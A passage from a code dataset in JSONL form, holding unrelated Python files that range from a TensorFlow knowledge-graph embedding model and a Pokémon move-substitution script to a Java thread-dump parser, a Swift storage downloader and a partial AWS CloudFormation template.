tf.matmul(h_emb_real * r_emb_real,\n                                 tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n        realimgimg = tf.matmul(h_emb_real * r_emb_img,\n                               tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n        imgrealimg = tf.matmul(h_emb_img * r_emb_real,\n                               tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n        imgimgreal = tf.matmul(h_emb_img * r_emb_img,\n                               tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n\n        pred = realrealreal + realimgimg + imgrealimg - imgimgreal\n        pred_heads = tf.nn.sigmoid(pred)\n\n        realrealreal = tf.matmul(t_emb_real * r_emb_real,\n                                 tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n        
realimgimg = tf.matmul(t_emb_real * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgrealimg = tf.matmul(t_emb_img * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgimgreal = tf.matmul(t_emb_img * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n\n pred = realrealreal + realimgimg + imgrealimg - imgimgreal\n pred_tails = tf.nn.sigmoid(pred)\n\n hr_t = self.hr_t * (1.0 - self.config.label_smoothing) + 1.0 / self.data_stats.tot_entity\n rt_h = self.rt_h * (1.0 - self.config.label_smoothing) + 1.0 / self.data_stats.tot_entity\n\n loss_tails = tf.reduce_mean(tf.keras.backend.binary_crossentropy(hr_t, pred_tails))\n loss_heads = tf.reduce_mean(tf.keras.backend.binary_crossentropy(rt_h, pred_heads))\n\n # reg_losses = tf.nn.l2_loss(self.E) + tf.nn.l2_loss(self.R) + tf.nn.l2_loss(self.W)\n\n self.loss = loss_heads + loss_tails # + self.config.lmbda * reg_losses\n\n def def_layer(self):\n self.inp_drop = tf.keras.layers.Dropout(rate=self.config.input_dropout)\n\n def layer(self, h, r, t):\n h = tf.squeeze(h)\n r = tf.squeeze(r)\n t = tf.squeeze(t)\n\n h = self.inp_drop(h)\n r = self.inp_drop(r)\n t = self.inp_drop(t)\n\n return h, r, t\n\n def test_batch(self):\n h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img = self.embed(self.test_h_batch,\n self.test_r_batch,\n self.test_t_batch)\n\n h_emb_real, r_emb_real, t_emb_real = self.layer(h_emb_real, r_emb_real, t_emb_real)\n h_emb_img, r_emb_img, t_emb_img = self.layer(h_emb_img, r_emb_img, t_emb_img)\n\n h_emb_real = tf.squeeze(h_emb_real)\n r_emb_real = tf.squeeze(r_emb_real)\n t_emb_real = tf.squeeze(t_emb_real)\n h_emb_img = tf.squeeze(h_emb_img)\n r_emb_img = tf.squeeze(r_emb_img)\n t_emb_img = tf.squeeze(t_emb_img)\n\n realrealreal = tf.matmul(h_emb_real * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n realimgimg = tf.matmul(h_emb_real * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgrealimg = tf.matmul(h_emb_img * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgimgreal = tf.matmul(h_emb_img * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n\n pred_tails = realrealreal + realimgimg + imgrealimg - imgimgreal\n pred_tails = tf.nn.sigmoid(pred_tails)\n\n realrealreal = tf.matmul(t_emb_real * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n realimgimg = tf.matmul(t_emb_real * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgrealimg = tf.matmul(t_emb_img * r_emb_real,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_img, axis=1)))\n imgimgreal = tf.matmul(t_emb_img * r_emb_img,\n tf.transpose(tf.nn.l2_normalize(self.emb_e_real, axis=1)))\n\n pred_heads = realrealreal + realimgimg + imgrealimg - imgimgreal\n pred_heads = tf.nn.sigmoid(pred_heads)\n\n _, head_rank = tf.nn.top_k(pred_tails, k=self.data_stats.tot_entity)\n _, tail_rank = tf.nn.top_k(pred_heads, k=self.data_stats.tot_entity)\n\n return head_rank, tail_rank\n\n def embed(self, h, r, t):\n \"\"\"function to get the embedding value\"\"\"\n norm_emb_e_real = tf.nn.l2_normalize(self.emb_e_real, axis=1)\n norm_emb_e_img = tf.nn.l2_normalize(self.emb_e_img, axis=1)\n norm_emb_rel_real = tf.nn.l2_normalize(self.emb_rel_real, axis=1)\n norm_emb_rel_img = tf.nn.l2_normalize(self.emb_rel_img, axis=1)\n\n h_emb_real = tf.nn.embedding_lookup(norm_emb_e_real, h)\n t_emb_real = tf.nn.embedding_lookup(norm_emb_e_real, t)\n\n h_emb_img = 
tf.nn.embedding_lookup(norm_emb_e_img, h)\n t_emb_img = tf.nn.embedding_lookup(norm_emb_e_img, t)\n\n r_emb_real = tf.nn.embedding_lookup(norm_emb_rel_real, r)\n r_emb_img = tf.nn.embedding_lookup(norm_emb_rel_img, r)\n\n return h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img\n\n def get_embed(self, h, r, t, sess=None):\n \"\"\"function to get the embedding value in numpy\"\"\"\n h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img = self.embed(h, r, t)\n h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img = sess.run(\n [h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img])\n return h_emb_real, h_emb_img, r_emb_real, r_emb_img, t_emb_real, t_emb_img\n\n def get_proj_embed(self, h, r, t, sess):\n \"\"\"function to get the projected embedding value in numpy\"\"\"\n return self.get_embed(h, r, t, sess)\n","sub_path":"pykg2vec/core/Complex.py","file_name":"Complex.py","file_ext":"py","file_size_in_byte":9765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"416438971","text":"# coding: utf-8\n# 3층 신경망 구현하기 – 신호전달 구현1: 은닉1층 전달\nimport numpy as np\n\nprint('\\n= 신호전달 구현1: 은닉1층 전달 ==============================')\n\nx = np.array([1., 5.])\nprint(f'x dimension: {x.shape}') # 2 vector\nw1 = np.array([\n [0.1, 0.2, 0.5],\n [0.3, 0.4, 1.]\n])\nprint(f'w1 dimension: {w1.shape}') # 2 X 3 matrix\nb1 = np.array([0.1, 0.2, 0.3])\nprint(f'b1 dimension: {b1.shape}') # 3 vector\n# 오류: 일차함수(식) 중심으로 생각하지 말고 신호 중심으로 생각 할 것\n# a1 = np.dot(w1, x) + b1\na1 = np.dot(x, w1) + b1\nprint(f'a1 = {a1}')\n\n# tensor flows~\n# 3 x 2(m) 2(v) -> 3(v)\n# tensor1(크기2) 입력신호가 뉴런에서 tensor2(가중치)와 총합으로 tensor1(크기3) 출력신호가 되었다.\n","sub_path":"04.deep-learning/02.neural-network/03.3-layer-neural-network-practices/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"516833950","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom forms import AddedPokes\n\n\ndef attack_substitution(num, attack):\n if attack is None:\n raise Exception()\n elif attack == 'After You':\n # Patrat/Watchog\n if num == 504 or num == 505:\n return 'Covet'\n # Lopunny\n elif num == 428:\n return 'Draining Kiss'\n # Petilil\n elif num == 548:\n return 'Heal Bell'\n # Minccino\n elif num == 572:\n return 'Iron Tail'\n # Togetic/Togekiss\n elif num == 176 or num == 468:\n return 'Moonblast'\n # Togepi\n elif num == 175:\n return 'Soft Boiled'\n # Buneary\n elif num == 427:\n return 'Sweet Kiss'\n # Clefairy and Audino\n elif num == 35 or num == 531:\n return 'Wish'\n # Oranguru\n elif num == 765:\n return 'Wonder Room'\n # Maractus\n elif num == 556:\n return 'Wood Hammer'\n elif attack == 'Ally Switch':\n # Kadabra/Alakazam\n if num == 64 or num == 65:\n return 'Barrier'\n # Hoopa\n elif num == 720:\n return 'Magic Room'\n elif attack == 'Follow Me':\n # Sentret/Furret\n if num == 161 or num == 162:\n return 'Covet'\n # Togepi/Togetic\n elif num == 175 or num == 176:\n return 'Draining Kiss'\n # Clefairy\n elif num == 35:\n return 'Mimic'\n elif attack == 'Frustration':\n # Buneary\n if num == 427:\n return 'Fake Tears'\n elif attack == 'Helping Hand':\n # Meowstic\n if num == 678:\n return 'Assist'\n # Jirachi\n elif num == 385:\n return 'Calm Mind'\n # Sentret/Furret\n elif num == 161 or num == 162:\n return 'Charm'\n # Tyrogue and Minccino\n elif num == 236 or num == 572:\n return 'Covet'\n # 
Volbeat/Illumise\n elif num == 313 or num == 314:\n return 'Dizzy Punch'\n # Marill/Azumarill/Azurill\n elif num == 183 or num == 184 or num == 298:\n return 'Draining Kiss'\n # Gallade\n elif num == 475:\n return 'Dual Chop'\n # Petilil\n elif num == 548:\n return 'Fairy Wind'\n # Audino\n elif num == 531:\n return 'Heal Bell'\n # Growlithe and Lillipup line\n elif num == 58 or 506 <= num <= 508:\n return 'Howl'\n # Keldeo\n elif num == 647:\n return 'Icy Wind'\n # Cobalion\n elif num == 638:\n return 'Iron Defense'\n # Cinccino\n elif num == 573:\n return 'Iron Tail'\n # Magearna\n elif num == 801:\n return 'Light Screen'\n # Comfey\n elif num == 764:\n return 'Lucky Chant'\n # Leavanny\n elif num == 542:\n return 'Me First'\n # Nidoran line\n elif 29 <= num <= 33:\n return 'Poison Tail'\n # Alomomola\n elif num == 594:\n return 'Refresh'\n # Terrakion\n elif num == 639:\n return 'Stealth Rock'\n # Plusle/Minun\n elif num == 311 or num == 312:\n return 'Sweet Kiss'\n # Virizion\n elif num == 640:\n return 'Synthesis'\n # Latias/Latios and Cottonee and Oricorio\n elif num in [380, 381, 546, 741]:\n return 'Tailwind'\n # Cherubi/Cherrim and Pykumuku\n elif num == 420 or num == 421 or num == 771:\n return 'Tickle'\n # Wishiwashi\n elif num == 746:\n return 'Water Sport'\n # Eeveelutions all start with this\n # Also Poipole and Naganadel -- TODO: too lazy to come up with an alternative right now\n elif num in [133, 134, 135, 136, 196, 197, 470, 471, 700, 803, 804]:\n return None\n elif attack == 'Instruct':\n # Oranguru\n if num == 765:\n return 'Light Screen'\n elif attack == 'Quash':\n # Sableye\n if num == 302 or num == AddedPokes.MEGA_SABLEYE.value:\n return 'Night Slash'\n # Oranguru\n elif num == 765:\n return 'Psychic Terrain'\n # Murkrow/Honchkrow\n elif num == 198 or num == 430:\n return 'Roost'\n elif attack == 'Rage Powder':\n # Foongus/Amoonguss\n if num == 590 or num == 591:\n return 'Gastro Acid'\n # Paras/Parasect\n elif num == 46 or num == 47:\n return 'Leech Life'\n # Butterfree and Volcarona\n elif num == 12 or num == 637:\n return 'Morning Sun'\n # Hoppip line\n elif 187 <= num <= 189:\n return 'Silver Wind'\n elif attack == 'Return':\n # Lopunny\n if num == 428:\n return 'Captivate'\n elif attack == 'Spotlight':\n # Morelull/Shiinotic\n if num == 755 or num == 756:\n return 'Aromatherapy'\n # Starmie\n elif num == 121:\n return 'Cosmic Power'\n # Lanturn\n elif num == 171:\n return 'Soak'\n # Clefairy/Clefable\n elif num == 35 or num == 36:\n return 'Wish'\n elif attack == 'Wide Guard':\n # Mareanie/Toxapex\n if num == 747 or num == 748:\n return 'Acid Armor'\n # Throh\n elif num == 538:\n return 'Brick Break'\n # Mantine/Mantyke\n elif num == 226 or num == 458:\n return 'Dive'\n # Hitmontop\n elif num == 237:\n return 'Drill Run'\n # Mienshao\n elif num == 620:\n return 'Dual Chop'\n # Kingler\n elif num == 99:\n return 'Fury Cutter'\n # Tirtouga/Carracosta\n elif num == 564 or num == 565:\n return 'Iron Defense'\n # Lunala\n elif num == 792:\n return 'Light Screen'\n # Hitmonlee\n elif num == 106:\n return 'Low Kick'\n # Regigagas\n elif num == 486:\n return 'Mega Punch'\n # Alomomola and Avalugg\n elif num == 594 or num == 713:\n return 'Mist'\n # Solgaleo\n elif num == 791:\n return 'Reflect'\n # Gallade\n elif num == 475:\n return 'Sacred Sword'\n # Probopass\n elif num == 476:\n return 'Stealth Rock'\n # Araquanid\n elif num == 752:\n return 'Sticky Web'\n # Stakataka\n elif num == 805:\n return 'Stone Edge'\n # Machamp\n elif num == 68:\n return 'Superpower'\n # 
Mr. Mime\n elif num == 122:\n return 'Teeter Dance'\n # Celesteela and Guzzlord -- TODO: too lazy to come up with an alternative right now\n elif num == 797 or num == 799:\n return None\n elif attack == 'Ion Deluge':\n # Replace for all Pokemon\n return 'Electrify'\n elif attack == 'Judgment':\n # Intentional spelling change -- applies to all obviously\n return 'Judgement'\n\n return attack\n\n\ndef ability_substitution(num, ability):\n if ability == 'Battery':\n # Charjabug\n if num == 737:\n return 'Static'\n elif ability == 'Early Bird':\n # Natu/Xatu -- I just love this ability and I want more Pokemon to have it\n if num == 177 or num == 178:\n return 'Magic Bounce'\n elif ability == 'Friend Guard':\n # Spewpa\n if num == 665:\n return 'No_Ability'\n elif ability == 'Illuminate':\n # Staryu/Starmie and Watchog\n if num == 120 or num == 121 or num == 505:\n return 'Analytic'\n # Volbeat\n elif num == 313:\n return 'Prankster'\n elif num == 755 or num == 756:\n return 'Rain Dish'\n # Chinchou/Lanturn\n elif num == 170 or num == 171:\n return 'Water Absorb'\n elif ability == 'Minus':\n # Klink line\n if 599 <= num <= 601:\n return 'No_Ability'\n # Minun\n elif num == 312:\n return 'Static'\n elif ability == 'Power Construct':\n # Zygarde -- this should always be true if inside this if\n if num == 718:\n return 'No_Ability'\n elif ability == 'Plus':\n # Klink line\n if 599 <= num <= 601:\n return 'Clear Body'\n # Mareep line\n elif 179 <= num <= 181:\n return 'No_Ability'\n # Plusle\n elif num == 311:\n return 'Static'\n elif ability == 'Receiver':\n # Passimian\n if num == 766:\n return 'No_Ability'\n elif ability == 'Run Away':\n # Ponyta/Rapidash should really have this ability\n if num == 77 or num == 78:\n return 'Flame Body'\n elif ability == 'Stall':\n # Sableye -- Prankster is way cooler\n if num == 302:\n return 'Prankster'\n elif ability == 'Symbiosis':\n # Flabebe line\n if 669 <= num <= 671:\n return 'Flower Gift'\n elif ability == 'Telepathy':\n # Elgyem/Beheeyem\n if num == 605 or num == 606:\n return 'Analytic'\n # Wobbuffet/Wynaut and Meditite/Medicham and Dialga/Palkia/Giratina\n # and Oranguru and the Tapus\n elif num == 202 or num == 360 \\\n or num == 307 or num == 308 \\\n or num == 483 or num == 484 or num == 487 \\\n or num == 765 \\\n or 785 <= num <= 788:\n return 'No_Ability'\n elif ability == 'Zen Mode':\n if num == 555:\n return 'No_Ability'\n\n return ability\n\n\n# My personal type changes\ndef type_substitution(num, types):\n # Ninetales is now Psychic type\n if num == 38:\n assert types == ['Fire', 'No_Type']\n return ['Fire', 'Psychic']\n # Psyduck/Golduck are now Psychic type\n elif num == 54 or num == 55:\n assert types == ['Water', 'No_Type']\n return ['Water', 'Psychic']\n # Horsea/Seadra are now Dragon type\n elif num == 116 or num == 117:\n assert types == ['Water', 'No_Type']\n return ['Water', 'Dragon']\n # Gyarados is now Water/Dragon instead of Water/Flying\n elif num == 130:\n assert types == ['Water', 'Flying']\n return ['Water', 'Dragon']\n # Noctowl is now Psychic/Flying\n elif num == 164:\n assert types == ['Normal', 'Flying']\n return ['Psychic', 'Flying']\n # Luxray is now Dark type\n elif num == 405:\n assert types == ['Electric', 'No_Type']\n return ['Electric', 'Dark']\n # Flabebe line is now Grass type\n elif 669 <= num <= 671:\n assert types == ['Fairy', 'No_Type']\n return ['Fairy', 'Grass']\n # Goomy line is now Water type\n elif 704 <= num <= 706:\n assert types == ['Dragon', 'No_Type']\n return ['Dragon', 'Water']\n # Mega Absol 
(Asbel) is Fairy type :)\n elif num == AddedPokes.MEGA_ABSOL.value:\n assert types == ['Dark', 'No_Type']\n return ['Dark', 'Fairy']\n\n return types\n","sub_path":"scripts/substitution.py","file_name":"substitution.py","file_ext":"py","file_size_in_byte":11093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"109273036","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\n\nimport threading\nimport rcp\n\nlogging.basicConfig(level=logging.DEBUG,\n format='[%(asctime)s][%(levelname)s] %(message)s')\n_log = logging.getLogger(__name__)\n\n\nclass LampProxy(rcp.Proxy):\n def set_status(self, status):\n return self._make('set_status')(status)\n\n\nlamp = LampProxy('127.0.0.1/lamp')\nlamp.set_status(True)\nlamp.set_status(False)\n\n'''\n_log.info('Starting 1')\nthreading.Thread(target=lamp.set_status, args=(True,)).start()\n\n_log.info('Starting 2')\nthreading.Thread(target=rcp.Function('127.0.0.1/DO_SOME_SHIT')).start()\n\n_log.info('Starting 3')\nrcp.call('127.0.0.1/lamp/set_status', args=[True])\n'''\n","sub_path":"example/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"187061816","text":"Lvls = input().strip().split()\n\ndef CheckRise(Elevation, i=None, memo=None):\n if memo is None:\n memo=[]\n if i is None:\n i=0\n memo.append(0)\n j = i+1\n k = i\n if j < len(Elevation)-2 and k < len(Elevation)-1:\n while Elevation[j] > Elevation[k]:\n memo[-1] += 1\n j+= 1\n k += 1\n if i < len(Elevation)-1 :\n return CheckRise(Elevation, i+1, memo)\n if i == len(Elevation)-1:\n return [str(n) for n in memo]\n\n\nx = CheckRise(Lvls)\nprint(\" \".join(x))\n","sub_path":"Mornings/climb.py","file_name":"climb.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"201831376","text":"import re\r\nimport datetime\r\nfrom stackrecord import StackRecord\r\n\r\n#ignore = ['LDAPConnThread','Timer','MTUTimer','ClientNotifForwarder','DoSManager']\r\n\r\ndef parsetimestamprec(rec):\r\n\r\n pattern = r'^(\\d{4})-(\\d{2})-(\\d{2}) (\\d{2}):(\\d{2}):(\\d{2})'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n yr = int(match.group(1))\r\n mo = int(match.group(2))\r\n dy = int(match.group(3))\r\n h = int(match.group(4))\r\n m = int(match.group(5))\r\n s = int(match.group(6))\r\n\r\n return datetime.datetime(yr, mo, dy, h, m, s)\r\n\r\n return None\r\n\r\n\r\ndef parsemetarec(rec):\r\n\r\n pattern = r'^Full thread dump'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n return rec\r\n\r\n return None\r\n\r\n\r\ndef parseheaderrec(rec):\r\n\r\n # prepare dictionary object for header elements\r\n attrib = {}\r\n\r\n # thread name\r\n match = re.search(r'\\\"(.+?)\\\"', rec)\r\n if match:\r\n name = match.group(1)\r\n attrib['name'] = name\r\n\r\n else:\r\n attrib['name'] = ''\r\n\r\n # #number\r\n match = re.search(r'\\#(\\d+)\\s', rec)\r\n if match:\r\n num = int(match.group(1))\r\n attrib['num'] = num\r\n\r\n else:\r\n attrib['num'] = ''\r\n\r\n # daemon\r\n match = re.search(r'daemon', rec)\r\n if match:\r\n daemon = True\r\n else:\r\n daemon = False\r\n\r\n attrib['daemon'] = daemon\r\n\r\n # priority\r\n match = re.search(r'prio=(\\d+)', rec)\r\n if match:\r\n prio = int(match.group(1))\r\n attrib['prio'] = prio\r\n\r\n else:\r\n attrib['prio'] = ''\r\n\r\n # OS priority\r\n match = 
re.search(r'os_prio=(\\d+)', rec)\r\n if match:\r\n os_prio = int(match.group(1))\r\n attrib['os_prio'] = os_prio\r\n\r\n else:\r\n attrib['os_prio'] = ''\r\n\r\n # tid\r\n match = re.search(r'tid=([0-9a-z]+)', rec)\r\n if match:\r\n tid = match.group(1)\r\n attrib['tid'] = tid\r\n\r\n else:\r\n attrib['tid'] = ''\r\n\r\n # nid, state, mem\r\n match = re.search(r'nid=([0-9a-z]+)\\s([0-9a-z ]+)\\s\\[([0-9a-z]+)\\]', rec)\r\n if match:\r\n nid = match.group(1)\r\n state = match.group(2)\r\n mem = match.group(3)\r\n\r\n attrib['nid'] = nid\r\n attrib['state'] = state\r\n attrib['mem'] = mem\r\n\r\n else:\r\n attrib['nid'] = ''\r\n attrib['state'] = ''\r\n attrib['mem'] = ''\r\n\r\n return attrib\r\n\r\n\r\ndef parsestatusrec(rec):\r\n\r\n pattern = r'java.lang.Thread.State\\:\\s(.+)'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n return match.group(1)\r\n\r\n return None\r\n\r\n\r\ndef parsestackrec(rec):\r\n\r\n pattern = r'at\\s([0-9a-zA-z.$]+)\\((.+?)\\)'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n method = match.group(1)\r\n methodsrc = match.group(2)\r\n\r\n splitmethod = method.split('.')\r\n\r\n s = StackRecord()\r\n s.stackrec = method\r\n s.source = methodsrc\r\n s.elements = splitmethod\r\n s.rec_type = 'METHOD'\r\n\r\n #print(s)\r\n return s\r\n\r\n return None\r\n\r\n\r\ndef parseactionrec(rec):\r\n\r\n pattern = r'^-\\s([a-zA-Z0-9 ]+)\\<(.+?)\\>\\s\\((.+?)\\)'\r\n\r\n match = re.search(pattern, rec)\r\n if match:\r\n\r\n s = StackRecord()\r\n action = match.group(1).strip()\r\n if action == 'locked':\r\n s.locked = True\r\n\r\n elif action == 'parking to wait for':\r\n s.parking = True\r\n\r\n elif action == 'waiting on':\r\n s.waiting = True\r\n\r\n else:\r\n return None\r\n\r\n s.monitor_addr = match.group(2)\r\n s.monitor_type = match.group(3)[2:]\r\n s.rec_type = 'MONITOR'\r\n\r\n #print(s)\r\n return s\r\n\r\n return None\r\n\r\n\r\n\r\n","sub_path":"threadparser.py","file_name":"threadparser.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"261899954","text":"\"\"\"\nPulls the data from Swift and places it into the empty directory\nSWIFT_KEY environment variable to be passed by the template\n\"\"\"\n\nimport os\nimport zipfile\nimport time\nimport fasteners\nfrom io import BytesIO\nfrom swift_handler import SwiftHandler\n\n\nclass SwiftStore():\n\n swiftConnection = None\n\n\n def _getObject(self, key, b_delete):\n \"\"\"\n Returns an object associated with the specified key in the specified container\n Deletes the object after returning if specified\n \"\"\"\n\n try:\n containerName = key\n key = os.path.join('input','data')\n swiftDataObject = self.swiftConnection.get_object(containerName, key)\n if b_delete:\n self.swiftConnection.delete_object(containerName, key)\n self.qrint('Deleted object with key %s' %key)\n\n except Exception as exp:\n print(exp)\n\n return swiftDataObject\n\n\n def getData(self, **kwargs):\n \"\"\"\n Gets the data from the Swift storage, zips and/or encodes it and sends it to the client\n \"\"\"\n\n for k,v in kwargs.items():\n if k == 'path':\n key = v\n if k == 'in_dir':\n incoming_dir = v\n if k == 'out_dir':\n outgoing_dir = v\n\n try:\n swiftHandler = SwiftHandler()\n self.swiftConnection = swiftHandler._initiateSwiftConnection()\n dataObject = self._getObject(key, False)\n except Exception as err:\n print(err)\n \n objectInformation= dataObject[0]\n objectValue= dataObject[1]\n fileContent= objectValue\n\n fileBytes = 
BytesIO(fileContent)\n\n zipfileObj = zipfile.ZipFile(fileBytes, 'r', compression = zipfile.ZIP_DEFLATED)\n # We are extracting to the file to incoming_dir in container\n zipfileObj.extractall(incoming_dir)\n # Create outgoing_dir directory as the plugin container will output data there after processing.\n if not os.path.exists(outgoing_dir):\n os.makedirs(outgoing_dir)\n\nif __name__ == \"__main__\":\n incoming_dir = os.environ.get(\"INCOMING_DIR\")\n obj = SwiftStore()\n # The init-storage container in all the pods should acquire the lock\n with fasteners.InterProcessLock(\"/share/.lockfile\"):\n # If \"/share/.download-failed\" exists, exit with an error code immediately\n if os.path.exists(\"/share/.download-failed\"):\n print(\"Previous pod failed to download the data. Exiting with failure...\")\n exit(1)\n # If there is some data in incoming_dir but \"/share/.download-succeeded\" doesn't exist, it is a failure case\n # Exit with error code immediately\n if os.path.exists(incoming_dir) and len(os.listdir(incoming_dir)) > 0 and not os.path.exists('/share/.download-succeeded'):\n print(\"Some data was downloaded, but '/share/.download-succeeded' file doesn't exist. Exiting with failure...\")\n exit(1)\n # Download the data if \"/share/.download-succeeded\" does not exist\n if not os.path.exists('/share/.download-succeeded'):\n try:\n print(\"Lock acquired. Downloading data from Swift...\")\n obj.getData(path=os.environ.get('SWIFT_KEY'), in_dir=incoming_dir, out_dir=os.environ.get('OUTGOING_DIR'))\n os.mknod('/local/.download-pod')\n except Exception as err:\n print(\"Failed to download the data:\", err)\n # Create a failed file, if download failed to complete\n os.mknod(\"/share/.download-failed\")\n exit(1)\n # Create a success file, if download completed successfully\n os.mknod(\"/share/.download-succeeded\")\n print(\"Data downloaded!\")\n","sub_path":"openshift/pman-swift-publisher/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"109318322","text":"#!/usr/bin/env python2\n\n# Uses FAdo (python2):\n#\n# doc: http://pythonhosted.org/FAdo/\n# git: https://github.com/Glavin001/FAdo\n#\n# To install:\n#\n# $ pip install FAdo\n\nfrom FAdo.fa import *\n\nm3 = NFA()\nm3.setSigma(['0'])\nm3.addState(0)\nm3.addTransition(0, '0', 0)\nprint(m3)\n","sub_path":"automata/automata.py","file_name":"automata.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563725887","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\"\"\"\n\n# standard library imports\nimport logging\n# related imports\n# project imports\nfrom twittator.core.error import NoSuchTwitterAccount\n\nclass TwitterAccounts():\n \"\"\"\n Combines all controllable twitter accounts (soldiers and slaves)\n \"\"\"\n l = logging.getLogger(\"twittator.twitter_accounts\")\n\n def __init__(self):\n self._soldiers = []\n self._slaves = []\n\n def initialize(self, soldiers_model, slaves_model):\n try:\n self._soldiers = soldiers_model.instance()\n except Exception:\n self.l.warning(\"Could not get soldiers_model instance\")\n try:\n self._slaves = slaves_model.instance()\n except Exception:\n self.l.warning(\"Could not get slaves_model instance\")\n\n def terminate(self):\n pass\n\n def __iter__(self):\n return iter(list(self._soldiers) + list(self._slaves))\n\n def __getitem__(self, username):\n for account in 
self._soldiers:\n if account.username == username:\n return account\n else:\n for account in self._slaves:\n if account.username == username:\n return account\n else:\n raise NoSuchTwitterAccount(username)\n\n# ### singleton instance handling\n_instance = None\n\ndef create_instance():\n from twittator.model import soldiers_model, slaves_model\n global _instance\n _instance = TwitterAccounts()\n _instance.initialize(soldiers_model, slaves_model)\n\ndef destroy_instance():\n global _instance\n _instance.terminate()\n\ndef instance():\n global _instance\n assert _instance is not None, \"Instance not created yet!\"\n return _instance\n\ntwitter_proxy_instance = instance","sub_path":"twittator/model/twitter_accounts.py","file_name":"twitter_accounts.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"401885695","text":"from troposphere import Template, Ref, Tags, Join, GetAtt, Parameter\nfrom troposphere.kinesis import Stream\nfrom troposphere.s3 import Bucket, LifecycleConfiguration\nfrom troposphere.s3 import LifecycleRule, LifecycleRuleTransition\nfrom troposphere.iam import Role, PolicyProperty\nfrom troposphere.awslambda import Function, Code\nfrom troposphere.redshift import Cluster\nfrom troposphere.redshift import ClusterSecurityGroup\nfrom troposphere.redshift import ClusterSecurityGroupIngress\n\nfrom awacs.aws import Policy, Statement, Principal, Action\n\n\nowner = \"MyName\"\nowner_email = \"MyEmail\"\ndate = \"2015-08-10\"\nregion = \"eu-west-1\"\naccount_id = \"123456789101\"\nbucket_name = \"my-big-data-pipeline\"\nlambda_function_name = \"moveToS3\"\n\nt = Template()\nt.add_description(\"Example big data pipeline\")\n\n###############################################################################\n\nlambda_repository_bucket_name = t.add_parameter(Parameter(\n \"LambdaRepoS3BucketName\",\n Type=\"String\",\n Description=\"Name of bucket where versioned lambda zip are stored\"\n))\n\nlambda_repository_bucket_key = t.add_parameter(Parameter(\n \"LambdaRepoS3BucketKey\",\n Type=\"String\",\n Description=\"Key in bucket where versioned lambda zip is\"\n))\n\nlambda_repository_bucket_version = t.add_parameter(Parameter(\n \"LambdaRepoS3BucketVersion\",\n Type=\"String\",\n Description=\"Version of bucket where lambda zip is\"\n))\n\nconnect_from_ip = t.add_parameter(Parameter(\n \"ConnectFromCidr\",\n ConstraintDescription=\"must be a valid CIDR range of the form x.x.x.x/x.\",\n Description=\"IP CIDR from where you could access the Redshift cluster\",\n Default=\"0.0.0.0/0\",\n MinLength=\"9\",\n AllowedPattern=(\n \"(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})\\\\.(\\\\d{1,3})/(\\\\d{1,2})\"\n ),\n MaxLength=\"18\",\n Type=\"String\"\n))\n\nmaster_password = t.add_parameter(Parameter(\n \"RedShiftMasterPassword\",\n Description=\"Redshift master password\",\n Type=\"String\",\n NoEcho=True\n))\n\n###############################################################################\n\nkinesis_stream = t.add_resource(Stream(\n \"KinesisStream\",\n ShardCount=1\n))\n\n###############################################################################\n\ns3_lifecycle_rule = LifecycleRule(\n Status=\"Enabled\",\n Transition=LifecycleRuleTransition(\n StorageClass=\"Glacier\",\n TransitionInDays=30\n )\n)\n\n# NOTE: should really add \"retain\" if deleted.\ns3_bucket = t.add_resource(Bucket(\n 